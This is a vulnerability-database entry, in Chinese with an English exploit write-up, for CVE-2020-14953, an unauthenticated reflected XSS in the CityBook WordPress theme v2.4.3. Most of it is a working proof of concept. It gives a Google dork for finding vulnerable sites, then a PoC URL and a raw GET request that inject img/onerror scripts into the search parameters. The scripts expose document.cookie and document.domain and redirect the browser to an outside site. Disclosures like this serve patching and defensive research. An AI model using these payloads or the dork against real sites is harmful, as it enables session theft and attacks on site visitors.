漏洞ID | 11586 | 漏洞类型 | |
发布时间 | 2020-06-22 | 更新时间 | 2020-06-25 |
![]() | CVE-2020-14953 | ![]() | N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
漏洞来源
CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS
官方跳转
漏洞详情
尚未纰漏
漏洞EXP
[+] Exploit Title: CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/citybook/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: CTHthemes [ https://cththemes.com ]
[+] Software Version: 2.4.3
[+] Software Link: https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
[+] Tested on: Debian 10
[+] CVE: CVE-2020-14953
[+] CWE: CWE-79
### [ PoC: ]
[!] https://citybook2.cththemes.com/?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&lcats[]=47
[!] GET /?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&lcats[]=47 HTTP/1.1
Host: citybook2.cththemes.com
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector